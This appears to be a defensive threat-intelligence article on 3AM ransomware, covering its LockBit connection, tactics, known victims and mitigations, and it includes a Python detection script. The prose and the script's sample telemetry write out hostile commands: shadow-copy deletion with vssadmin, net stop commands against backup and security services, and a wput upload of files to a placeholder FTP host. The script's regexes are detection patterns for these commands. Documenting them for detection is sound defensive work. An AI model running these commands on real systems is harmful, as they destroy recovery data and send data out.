3AM ransomware is a relatively new entrant in the crowded ransomware landscape, first observed in late 2023. While its current impact appears limited, its unique characteristics, operational methods, and potential connections to other, more established ransomware groups make it a threat worth understanding. 3AM stands out for its use as a "fallback" payload when deployments of the notorious LockBit ransomware fail, its development in the Rust programming language, and its evolving tactics, including leveraging social media for extortion. This article provides a comprehensive overview of 3AM ransomware, covering its origins, tactics, targets, attack campaigns, and defense strategies, aiming to equip security professionals with the knowledge to combat this emerging threat.
3AM ransomware emerged in the latter half of 2023, making it a relatively recent addition to the threat landscape. Its initial appearances were notable for their connection to failed deployments of LockBit, one of the most prolific and damaging ransomware families. This "fallback" role suggests a few possibilities:
Affiliate Activity: 3AM might be used by a less-experienced or opportunistic ransomware affiliate who relies on it when their primary tool (LockBit) is blocked or detected.
Strategic Diversification: More established threat actors could be using 3AM as a secondary payload to target systems where LockBit is known to be ineffective or to diversify their attack arsenal.
Testing Ground: 3AM could be a testing ground for new techniques or a less-valuable tool used in lower-stakes attacks before deploying more sophisticated ransomware.
While the exact nature of the relationship is unclear, the connection to LockBit is significant. Reports also indicate that the operators of 3AM are likely Russian-speaking, further aligning with the general profile of many LockBit affiliates. This is supported by the analysis of their leak site data and communication styles.
The use of the Rust programming language is another notable aspect of 3AM's evolution. While not entirely unique, Rust is less common than languages like C/C++ in ransomware development. The choice of Rust likely provides advantages in terms of performance (faster encryption), cross-platform compatibility, and potentially, evasion of some traditional security solutions that are less familiar with Rust-based malware.
Further, Intrinsec's research highlights the evolution of 3AM, identifying strong connections between 3AM, the Conti syndicate, and the Royal ransomware gang. These connections are exhibited by the use of similar infrastructure, communication channels, and TTPs. New tactics have also been reported, such as using bots on the X platform (formerly Twitter) to amplify attacks and spread news of breaches through victims' social media followers.
3AM ransomware follows a typical double-extortion model: data exfiltration followed by encryption, with the threat of publicly releasing stolen data if the ransom is not paid. However, its operational details reveal a specific set of tactics and techniques:
Initial Access: While the exact initial access vectors are not always clear, common ransomware infection methods are likely employed. This includes:
* Spear Phishing: Targeted emails with malicious attachments or links.
* Exploitation of Vulnerabilities: Targeting unpatched software or systems, particularly those exposed to the internet.
* Compromised Credentials: Using stolen or brute-forced credentials to gain access to systems.
Reconnaissance and Lateral Movement: Once inside a network, 3AM operators perform reconnaissance to understand the environment and move laterally to maximize impact. This involves:
* Using commands like whoami, netstat, quser, and net share to gather information about the system and network.
* Employing gpresult to extract policy settings.
* Enumerating other servers using quser and net view.
* Potentially using tools like Cobalt Strike for post-exploitation and lateral movement (observed in cases where 3AM was deployed after failed LockBit attempts).
Persistence: 3AM may establish persistence on compromised systems to ensure continued access. One observed method involves creating new user accounts.
Data Exfiltration: Before encryption, 3AM exfiltrates data to the attacker's infrastructure. This is often done using tools like Wput, an FTP client. The exfiltrated data is then used as leverage in the extortion process.
Service Termination: A critical step in 3AM's operation is the termination of a wide range of services, particularly those related to security, backup, and database software. This is done to prevent interference with the encryption process and to hinder recovery efforts. The extensive list of targeted services demonstrates a thorough approach to disabling defenses.
Encryption: 3AM encrypts files and appends the .threeamtime extension. It offers command-line parameters to customize the encryption process, similar to Conti ransomware:
* -k: Specifies the access key (32 Base64 characters).
* -m: Selects the encryption method ("local" or "net").
* -s: Controls offsets within files for encryption, affecting speed.
* -p and -h: parameters with unknown functions have also been found.
Volume Shadow Copy Deletion: To prevent easy recovery, 3AM attempts to delete Volume Shadow Copies using vssadmin.exe delete shadows /all /quiet.
Ransom Note: A ransom note named RECOVER-FILES.txt is dropped in each encrypted folder. The note references "3 am" as a time of mysticism and threatens to sell the stolen data if the ransom is not paid. It provides a Tor URL and an access key for communication.
Extortion: 3AM employs a double-extortion strategy, threatening to sell stolen data if the ransom is not paid. It also uses automated X (Twitter) bots to pressure victims, a new tactic in which automated replies on X broadcast attacks and data leaks and damage the reputations of victim businesses.
File Marker: Encrypted files contain a distinct marker string "0x666".
Analysis of 3AM ransomware attacks and leak site data reveals a targeting pattern that aligns with broader geopolitical trends and the likely motivations of the operators:
Geographic Focus: Primarily targets Western-affiliated countries, with a strong emphasis on NATO member states. The United States is the most frequently targeted country, followed by the United Kingdom and France. A smaller percentage of targets have been observed in Malaysia.
Industry Focus: While specific industry targeting data is limited, the known victims suggest a focus on organizations with valuable data or critical infrastructure. This includes:
* Healthcare (e.g., Brunswick Hospital Center in New York).
* Manufacturing and Industrial (e.g., a Louisiana-based HVAC company).
* Government (e.g., the city of Hoboken, New Jersey).
Opportunistic vs. Targeted: The use of 3AM as a fallback payload suggests a degree of opportunism. However, the targeting of specific organizations and the potential use of spear-phishing indicate that some attacks are likely more targeted.
Political Motivations: The focus on Western countries, particularly NATO members, suggests a possible political motivation, aligning with the broader geopolitical tensions involving Russia and Western nations.
While 3AM ransomware is relatively new and has not been associated with a large number of publicly disclosed attacks, several incidents provide insights into its operations:
Failed LockBit Deployment (Initial Observation): The first documented use of 3AM occurred after a failed attempt to deploy LockBit ransomware. This incident highlighted 3AM's role as a secondary payload and provided valuable technical details about its operation.
Brunswick Hospital Center (New York): This attack demonstrated the real-world impact of 3AM, targeting a healthcare provider and potentially disrupting patient care.
Louisiana-based HVAC Company: This attack further illustrated 3AM's targeting of industrial and manufacturing sectors.
City of Hoboken (New Jersey): This attack involved the exfiltration and leakage of sensitive personal data and embarrassing content, showcasing the double-extortion tactics and the potential for reputational damage.
Numerous undisclosed attacks: Because 3AM is relatively new, many attacks likely go unreported and/or uncredited, which makes it hard to gain deeper insight into its operations.
Protecting against 3AM ransomware, and ransomware in general, requires a multi-layered security approach that focuses on prevention, detection, and response:
Robust Email Security: Implement strong email filtering and security gateways to block phishing emails and malicious attachments. Train employees to recognize and report suspicious emails.
Vulnerability Management: Regularly scan for and patch vulnerabilities in software and systems, particularly those exposed to the internet. Prioritize patching of known exploited vulnerabilities.
Endpoint Detection and Response (EDR): Deploy EDR solutions on all endpoints to detect and block malicious activity, including ransomware execution. Configure EDR to monitor for unusual process behavior, service terminations, and file modifications.
Network Segmentation: Segment the network to limit the lateral movement of attackers. This can contain the impact of a successful breach.
Least Privilege Access: Enforce the principle of least privilege, granting users only the access they need to perform their jobs. This reduces the potential damage from compromised accounts.
Multi-Factor Authentication (MFA): Implement MFA for all critical systems and accounts, particularly those with remote access.
Data Backup and Recovery: Maintain regular, offline backups of critical data. Test the backup and recovery process to ensure its effectiveness. Consider using the 3-2-1 backup rule (3 copies of data, on 2 different media, with 1 offsite copy).
Security Awareness Training: Educate employees about the risks of ransomware and social engineering tactics. Conduct regular phishing simulations to test awareness and reinforce best practices.
Incident Response Plan: Develop and regularly test an incident response plan that outlines procedures for containing and recovering from a ransomware attack.
Monitor for Specific Indicators: Specifically for 3AM, monitor for:
* The creation of files with the .threeamtime extension.
* The presence of the RECOVER-FILES.txt ransom note.
* Unusual network activity associated with Wput or other FTP clients.
* Attempts to terminate a large number of services, especially those related to security and backup.
* Execution of commands like vssadmin.exe delete shadows.
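The indicators listed above, together with the reconnaissance and service-termination behaviour described in the tactics section, can be turned into simple per-host detection logic. The following is an added example (not code from the original article or from any vendor product) that runs the rules over a constructed, hypothetical set of process-creation and file-creation events; the thresholds, host names, and the Sysmon-style tuple format are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not real logs): (event_type, host, detail), where
# event_type is "proc" (a command line) or "file" (a path that was created).
EVENTS = [
    ("proc", "ws01", "whoami"),
    ("proc", "ws01", "net share"),
    ("proc", "ws01", "quser"),
    ("proc", "ws01", "net view \\\\fs01"),
    ("proc", "ws01", "gpresult /z"),
    ("proc", "ws01", "wput -u ftp://203.0.113.10/up C:\\Finance"),
    ("proc", "ws01", "net stop VeeamBackupSvc"),
    ("proc", "ws01", "net stop MSSQLSERVER"),
    ("proc", "ws01", "net stop SepMasterService"),
    ("proc", "ws01", "net stop wbengine"),
    ("proc", "ws01", "vssadmin.exe delete shadows /all /quiet"),
    ("file", "ws01", "C:\\Finance\\q3.xlsx.threeamtime"),
    ("file", "ws01", "C:\\Finance\\RECOVER-FILES.txt"),
    ("proc", "ws02", "net view"),  # a single recon command: stays below threshold
]

RECON = re.compile(r"^(whoami|netstat|quser|net\s+(?:share|view)|gpresult)\b", re.I)
SERVICE_STOP = re.compile(r"^(?:net\s+stop|sc(?:\.exe)?\s+stop)\b", re.I)
RULES = {  # single-event rules: alert name -> pattern applied to the detail field
    "exfil_ftp_client": re.compile(r"^wput\b", re.I),
    "shadow_copy_deletion": re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    "threeamtime_extension": re.compile(r"\.threeamtime$", re.I),
    "ransom_note_dropped": re.compile(r"[\\/]RECOVER-FILES\.txt$", re.I),
}
RECON_THRESHOLD = 3         # distinct recon commands per host (assumed tuning value)
SERVICE_STOP_THRESHOLD = 3  # service stop commands per host (assumed tuning value)


def detect(events):
    """Return {host: set of alert names} for the 3AM indicators in the article."""
    alerts, recon, stops = defaultdict(set), defaultdict(set), defaultdict(int)
    for kind, host, detail in events:
        for name, pattern in RULES.items():
            if pattern.search(detail):
                alerts[host].add(name)
        if kind == "proc":
            match = RECON.match(detail)
            if match:  # normalise whitespace so "net  share" and "net share" dedupe
                recon[host].add(re.sub(r"\s+", " ", match.group(1).lower()))
            elif SERVICE_STOP.match(detail):
                stops[host] += 1
    for host, commands in recon.items():  # burst rules need the whole sample
        if len(commands) >= RECON_THRESHOLD:
            alerts[host].add("recon_command_burst")
    for host, count in stops.items():
        if count >= SERVICE_STOP_THRESHOLD:
            alerts[host].add("mass_service_termination")
    return dict(alerts)
```

Hosts with no matching events are absent from the result, so an empty set of alerts never has to be filtered out downstream.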
Threat Intelligence: Stay current with threat intelligence, especially regarding new and novel ransomware families.
3AM ransomware, while relatively new, represents a growing threat in the evolving cybersecurity landscape. Its connection to LockBit, its use of Rust, its double-extortion tactics, and its focus on Western targets make it a significant concern for organizations. Although its current impact may be limited compared to more established ransomware families, its potential for growth and its evolving tactics, including social media extortion, warrant close attention. By understanding its origins, techniques, and targets, and by implementing robust, multi-layered security defenses, organizations can significantly reduce their risk of falling victim to 3AM and similar ransomware threats. Continuous monitoring, proactive threat intelligence gathering, and adaptive security strategies are crucial for staying ahead of this and other emerging cyber threats.
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.